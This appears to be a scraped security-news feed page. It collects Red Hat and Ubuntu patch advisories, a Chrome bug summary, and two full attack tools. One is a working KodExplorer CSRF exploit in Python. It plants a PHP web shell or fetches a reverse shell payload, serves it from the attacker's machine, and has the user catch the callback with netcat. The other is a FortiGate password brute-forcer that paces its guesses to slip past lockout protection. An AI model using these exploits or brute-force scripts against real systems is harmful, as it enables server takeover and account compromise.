Red Hat Security Advisory 2023-1923-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1923-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1923  
Issue date:        2023-04-21  
CVE Names:         CVE-2023-0461   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.src.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.src.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEJJZtzjgjWX9erEAQianQ//YnUy8jpbaXCIAc0ZNC8qP+4DbFC16ebN  
/wPX7q5UCNvKnqR3DS10iWiQYnlkhu15bqryeHlVwMSrEo67Cac9orbXLD1Oxjzs  
CX+zyk3I7+gvPyA7Wu7t6E+WgsVLtHvWcKk1PsdhCSQ2ms+3rl6jKgWiaoWNr7UB  
+5+/oEPkekHhrf5loIWZ6hK9S6sEmDThwXLja1Mb03eKUk3yenYZOo30lXsR2zyC  
fuNQxDOb4vFPMAr3BJ/vn6egIHzbg5TYMG1XFvDahdh7xBj7yMSnosZPPLIk/Sf6  
iw+ZUVsLFTvrJh0vbwXe+IPYU2khWg5p5fXYQlIxTG5QzZ1sVlq4w4MsqiOmGJzf  
/jibzeDAPBcmDcMQRUguOi3xw5A91p9PeJkq0gP9rvfsSugfiCiwDCgerBXSY7mk  
sNmCapqk8rU7PMTATleN94KejWn5A62NC4j4lHgYtj+dDXdbFK4DAIF6CBQ6+kKR  
6UuTZL4Uo0hOTCN+3zT9627xpDk4vChsQn/Sj4KQZzaU8lfQ5vVftzyLBokLdIJW  
80X+4I8bIJ43o2thq1Y+nkii7X+8+lFQ9ZSJ4oChXx/JQ9WIMaZYg62q3TGeX+8T  
cL35F8UD51zKGei80bExQyqAGlbQ2ORBGWl9uzJBMR5WyI2VObqALvzJvMIwovKp  
Urd/U30SCqk=  
=aXJP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1923-01

KODExplorer versions 4.49 and below suffer from cross site request forgery and remote shell upload vulnerabilities.

    # Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload# Date: 21/04/2023# Exploit Author: Mr Empy# Software Link: https://github.com/kalcaddle/KodExplorer# Version: <= 4.49# Tested on: Linux# References:# * https://vuldb.com/?id.227000# * https://www.cve.org/CVERecord?id=CVE-2022-4944# * https://github.com/MrEmpy/CVE-2022-4944import argparseimport http.serverimport socketserverimport osimport threadingimport requestsfrom time import sleepdef banner():    print(''' _   _____________ _____           _                      ______  _____ _____| | / /  _  |  _  \  ___|         | |                     | ___ \/  __ \| ___|| |/ /| | | | | | | |____  ___ __ | | ___  _ __ ___ _ __  | |_/ /| /  \/||__|    \| | | | | | |  __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| |    / | |    | __|| |\  \ \_/ / |/ /| |___>  <| |_) | | (_) | | |  __/ |    | |\ \ | \__/\||___\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_|  \___|_|    \_| \_|\____/\____/                            | |                            |_|                [KODExplorer <= v4.49 Remote Code Executon]                           [Coded by MrEmpy]''')def httpd():    port = 8080    httpddir = os.path.join(os.path.dirname(__file__), 'http')    os.chdir(httpddir)    Handler = http.server.SimpleHTTPRequestHandler    httpd = socketserver.TCPServer(('', port), Handler)    print('[+] HTTP Server started')    httpd.serve_forever()def webshell(url, lhost):    payload = '<pre><?php system($_GET["cmd"])?></pre>'    path = '/data/User/admin/home/'    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')    wshell_f = open('http/shell.php', 'w')    wshell_f.write(payload)    wshell_f.close()    print('[*] Opening HTTPd port')    th = threading.Thread(target=httpd)    th.start()    print(f'[+] Send this URI to your target:{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')    print(f'[+] After the victim opens the URI, his shell will be hosted at{url}/data/User/admin/home/shell.php?cmd=whoami')def reverseshell(url, lhost):    rvpayload = 'https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'    path = '/data/User/admin/home/'    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')    lport = input('[*] Your local port: ')    reqpayload = requests.get(rvpayload).text    reqpayload = reqpayload.replace('127.0.0.1', lhost)    reqpayload = reqpayload.replace('1234', lport)    wshell_f = open('http/shell.php', 'w')    wshell_f.write(reqpayload)    wshell_f.close()    print('[*] Opening HTTPd port')    th = threading.Thread(target=httpd)    th.start()    print(f'[+] Send this URI to your target:{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')    input(f'[*] Run the command "nc -lnvp {lport}" to receive theconnection and press any key\n')    while True:        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')        sleep(1)        if not hitshell.status_code == 200:            continue        else:            print('[+] Shell sent and executed!')            breakdef main(url, lhost, mode):    banner()    if mode == 'webshell':        webshell(url, lhost)    elif mode == 'reverse':        reverseshell(url, lhost)    else:        print('[-] There is no such mode. Use webshell or reverse')if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-u','--url', action='store', help='target url',dest='url', required=True)    parser.add_argument('-lh','--local-host', action='store', help='localhost', dest='lhost', required=True)    parser.add_argument('-m','--mode', action='store', help='mode(webshell, reverse)', dest='mode', required=True)    arguments = parser.parse_args()    main(arguments.url, arguments.lhost, arguments.mode)

KODExplorer 4.49 Cross Site Request Forgery / Shell Upload

Ubuntu Security Notice 6035-1 - It was discovered that KAuth incorrectly handled some configuration parameters with specially crafted arbitrary types. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6035-1April 20, 2023kauth vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 ESM- Ubuntu 16.04 ESMSummary:KAuth could be made to crash or run programs if it received specially craftedinput.Software Description:- kauth: Abstraction to system policy and authentication featuresDetails:It was discovered that KAuth incorrectly handled some configuration parameterswith specially crafted arbitrary types. An attacker could possibly use thisissue to cause a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 ESM:  libkf5auth-data                 5.44.0-0ubuntu1+esm1  libkf5auth5                     5.44.0-0ubuntu1+esm1Ubuntu 16.04 ESM:  libkf5auth-data                 5.18.0-0ubuntu2+esm1  libkf5auth5                     5.18.0-0ubuntu2+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6035-1  CVE-2019-7443

Ubuntu Security Notice USN-6035-1

Red Hat Security Advisory 2023-1919-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1919-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1919  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_7.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgpdzjgjWX9erEAQgUjA/9GvTg0OjMXhVUv5AF6hVj25NeVl1lrejR  
Zwzd/dvchjpT8bqLZhAKQs3REFtO9vVRcEt6OWEhcDY24iwE9Icpsg4gNsypZPOr  
e/o1WKNkDlyprHKtR0wQWuIqNnvIlYDChBpJIStS+nQix7Re9AKnBzXG0SNJsZP+  
0+3UV8OtGvJAmWJfpOH52JoSqAp9y8+eKxRkcHWhe843o+EiIwZR8GD5sedElw0b  
Oalmfse5clwSa5syXcr6yWVfrYBusxT3XIcSnEvu6QV8kuJJbwiWbdM+1ydLuYxg  
0OmarVvHTWMT+LVQr0glvADQaN1oZBKVg5OVRSc0ZnG+hvwnq/cK4GsBfFvegY2b  
UPyFnmJphETdVp9bNCtFBU3rtaVLjcWh0Y5PBRymIlxgDmji04IsJgK0HGwwrS8M  
jxKkw03g16DKWg7lleO76jlr30vsGXzqMKMSqjSNLhUKu6FbFdR/pJcXLaALzEXA  
S/AqUzJFuJp3cL1x6OBjFVwr38E9ElkQC9MSKV0JeoeOPCgY1Lew0JjoUAjcLR+M  
V17lpBY6b+E5kASDMWApUqunkjWsDg8abyFSyHeoMaxLx5QhIWmJuHLe0rtWfuEM  
zKO63TQXfVuqKma3yfWuwee5RqUpo5GplwWXH35qbJhUh8V63liXtXrTsu2F8uxx  
Lr20GwzdjN0=  
=wPFl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1919-01

Chrome has an issue where there is an out-of-bounds string copy that can occur when parsing a uniform sampler name in SpvGetMappedSamplerName.

Chrome SpvGetMappedSamplerName Out-Of-Bounds String Copy

Red Hat Security Advisory 2023-1916-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd and mod_http2 security update  
Advisory ID:       RHSA-2023:1916-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1916  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for httpd and mod_http2 is now available for Red Hat Enterprise  
Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
httpd-2.4.51-7.el9_0.4.src.rpm  
mod_http2-1.15.19-3.el9_0.5.src.rpm

aarch64:  
httpd-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-devel-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-tools-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_http2-1.15.19-3.el9_0.5.aarch64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.aarch64.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.aarch64.rpm  
mod_ldap-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_lua-2.4.51-7.el9_0.4.aarch64.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_session-2.4.51-7.el9_0.4.aarch64.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ssl-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm

noarch:  
httpd-filesystem-2.4.51-7.el9_0.4.noarch.rpm  
httpd-manual-2.4.51-7.el9_0.4.noarch.rpm

ppc64le:  
httpd-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-devel-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-tools-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_http2-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_ldap-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_lua-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_session-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ssl-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm

s390x:  
httpd-2.4.51-7.el9_0.4.s390x.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.s390x.rpm  
httpd-devel-2.4.51-7.el9_0.4.s390x.rpm  
httpd-tools-2.4.51-7.el9_0.4.s390x.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_http2-1.15.19-3.el9_0.5.s390x.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.s390x.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.s390x.rpm  
mod_ldap-2.4.51-7.el9_0.4.s390x.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_lua-2.4.51-7.el9_0.4.s390x.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.s390x.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_session-2.4.51-7.el9_0.4.s390x.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_ssl-2.4.51-7.el9_0.4.s390x.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.s390x.rpm

x86_64:  
httpd-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-devel-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-tools-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_http2-1.15.19-3.el9_0.5.x86_64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.x86_64.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.x86_64.rpm  
mod_ldap-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_lua-2.4.51-7.el9_0.4.x86_64.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_session-2.4.51-7.el9_0.4.x86_64.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ssl-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgoNzjgjWX9erEAQhLLg/6Aom/QnxDa3PEpD4Bjil+3AT4x6K6T0/d  
i4qyIgFHUcWTdGVQQU+oEMmMlEi9sJAl9EB8rGYQbPcjquqGWDZn7kbVJGeDaaZQ  
vZF/eQXybuCCc4WBBb9bM0jdWtGh4im7L5+sIO8XPD87yQAbf7R+04PfW5yua0I5  
OkVELzaItgMsi9YBPLmzBDBTxPeSwKK9htWVGL0UhM3225uJCywddjfRL5xwQaLB  
+aLx+A3K2VP4Ve9/frnSKm4omkIkdUE7Nw1kA+2bseCq3OwDF+Fr5/A9RHsiEtfh  
FqPRp/uzUShM0UCzGfy9TATsIQjgGuGGxIFGWrjcYlKKUNJ+7Fs0KWGfZipXc2sv  
TzhPW0UXZx2bJUohBd06yYF4Ghr+z9jKWrhOEad4bsgjPf5fWhdMpxzOBPB9Cz4l  
3UOTxEualVfOjUe2lKPlwYtItfFkY9kvgaQDTgOvbx15DUaw2rIsY6dWRWJsPfJw  
T3F+MKEvEnmbTU+n86d2XR2BP+8vAyDuJuJ+2ZEc1tUhcsXyUuMG8f7VynjP9hHm  
aRTWK2/2ugy8BfJfoUS/9cM3w6GF0zxyCkDme7txbUqUw89LIxhVBum2c3oUfmd6  
ScfHYWRr0R9NxAXzgCjA7sX6HlVZSoIKhWFtegsADAS6yNVb+dBVavbfUYrRgrOE  
iuiNhsEFBV4=  
=Ps2v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1916-01

This python script is a slow brute forcing utility to check passwords against FortiGate appliances. Check the homepage link for more information on how this was used to slowly bypass brute force protections.

    c@ubuntu:~/LABS/_BruteFortiGates.py$ cat bfg.py#!/usr/bin/env python3# bfg.py -- brute forti gate## 18.04.2023 @ 17:20## slow brute force script to check fortigate's password from file#import requestsfrom random import *from time import *session = requests.session()words = open('WORDS.txt', 'r')for passwd in words:    num = randint(50, 120)    print("...sleeping... %s" % num)    sleep(num)    passwd = passwd.rstrip()    burp0_url = "http://192.168.56.222:80/logincheck"    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0", "Accept": "*/*", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Pragma": "no-cache", "Cache-Control": "no-store, no-cache, must-revalidate", "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Origin": "http://192.168.56.222", "Connection": "close", "Referer": "http://192.168.56.222/login?redir=%2F"}    burp0_data = {"ajax": "1", "username": "admin", "secretkey": passwd, "redir": "/"}    print("> checking passwd: %s" % passwd)    try:        req = session.post(burp0_url, headers=burp0_headers, data=burp0_data)        resp = req.text        print(resp)        print("OK DONE with passwd: %s" % passwd )        # 0 in resp = no; 2 in resp = no; 1 in resp = redir = yes    except requests.exceptions.RequestException as e:        print(e)print('fin.')

FortiGate Brute Forcer

